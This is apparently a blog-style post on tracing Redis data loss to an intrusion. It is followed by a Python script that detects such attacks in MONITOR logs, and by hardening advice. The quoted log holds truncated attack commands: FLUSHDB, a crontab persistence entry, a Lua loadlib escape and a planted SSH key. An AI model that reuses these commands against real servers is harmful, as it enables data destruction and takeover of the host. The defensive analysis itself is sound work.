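Troubleshooting Data Loss
The data in Redis kept getting wiped for no apparent reason. My first thought was that memory was insufficient, so I allocated more memory to Redis, but a few days later the data was lost again.
Log monitoring
So I added monitoring to Redis to record every command it executed (认证密码 in the command below is a placeholder for the authentication password):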
redis-cli -a "认证密码" monitor >/data/redis/redis-op.log
Then I waited for the next data loss.
Sure enough, an unknown IP had connected to Redis and executed intrusion commands:
......
1700196657.193436 [0 112.124.38.111:59790] "AUTH" "(redacted)"
1700196657.220648 [0 112.124.38.111:59790] "AUTH" "(redacted)"
1700196657.247926 [0 112.124.38.111:59790] "AUTH" "(redacted)"
1700196657.275196 [0 112.124.38.111:59790] "AUTH" "(redacted)"
1700196657.302442 [0 112.124.38.111:59790] "AUTH" "(redacted)"
1700196657.329673 [0 112.124.38.111:59790] "info" "server"
1700196657.356931 [0 112.124.38.111:59790] "FLUSHDB"
1700196657.384302 [0 112.124.38.111:59790] "set" "x" "\n* * * * * if ! ps | grep -v grep | grep -q oGywWxvO6y;then exec 6<>/dev
1700196657.438947 [0 112.124.38.111:59790] "eval" "local ver = string.match(_VERSION,\"%d.%d\");local io_l = package.loadlib(st
1700196657.466455 [0 112.124.38.111:59790] "FLUSHDB"
1700196657.493742 [0 112.124.38.111:59790] "set" "x" "\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZh7PuIw0sqnlzZcJAYWJ8/vx4q/yfW
......
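A log like the one above can be triaged automatically. The following Python script is an added example, not part of the original post: it parses MONITOR output and flags clients outside an allowlist, repeated AUTH, sensitive commands, and SET values shaped like a crontab entry or an SSH key. The allowlist, the tag names, the extra commands FLUSHALL and CONFIG, and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# MONITOR line: <epoch> [<db> <ip>:<port>] "<cmd>" "<arg>" ...
# Only the first token must be complete, so lines cut off mid-argument still parse.
HEADER = re.compile(r'^\d+\.\d+ \[\d+ ([^\]\s]+):\d+\] "([^"]*)"(.*)$')
# FLUSHDB and EVAL appear in the log above; FLUSHALL and CONFIG are added here.
SENSITIVE = {"FLUSHDB", "FLUSHALL", "EVAL", "CONFIG"}
# Value shapes seen in the log above: a crontab entry or an SSH public key.
PAYLOAD = re.compile(r"\* \* \* \* \*|ssh-rsa ")
ALLOWED_CLIENTS = {"127.0.0.1"}  # assumption: the only legitimate client address

def analyze(lines, allowed=ALLOWED_CLIENTS, auth_burst=3):
    """Return {client_ip: sorted list of finding tags} for a MONITOR log."""
    findings = defaultdict(set)
    auth_count = defaultdict(int)
    for line in lines:
        m = HEADER.match(line.strip())
        if not m:
            continue  # separators such as "......" and non-IPv4 client records
        ip, cmd, rest = m.group(1), m.group(2).upper(), m.group(3)
        if ip not in allowed:
            findings[ip].add("unknown-client")
        if cmd == "AUTH":
            auth_count[ip] += 1
            if auth_count[ip] >= auth_burst:
                findings[ip].add("auth-burst")
        if cmd in SENSITIVE:
            findings[ip].add("sensitive:" + cmd)
        if cmd == "SET" and PAYLOAD.search(rest):
            findings[ip].add("payload-in-set")
    return {ip: sorted(tags) for ip, tags in findings.items()}

# Constructed sample in the MONITOR format; payloads are elided on purpose.
SAMPLE = r'''1700000000.000001 [0 127.0.0.1:50000] "get" "session:1"
1700000001.000001 [0 203.0.113.7:40000] "AUTH" "(redacted)"
1700000001.000002 [0 203.0.113.7:40000] "AUTH" "(redacted)"
1700000001.000003 [0 203.0.113.7:40000] "AUTH" "(redacted)"
1700000001.000004 [0 203.0.113.7:40000] "FLUSHDB"
1700000001.000005 [0 203.0.113.7:40000] "set" "x" "\n* * * * * (elided)
1700000001.000006 [0 203.0.113.7:40000] "eval" "(elided)
......'''.splitlines()

if __name__ == "__main__":
    for ip, tags in analyze(SAMPLE).items():
        print(ip, ", ".join(tags))
```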
Recommendations
1. Change the password immediately.
2. Add a firewall on the server to keep unknown IPs from breaking in.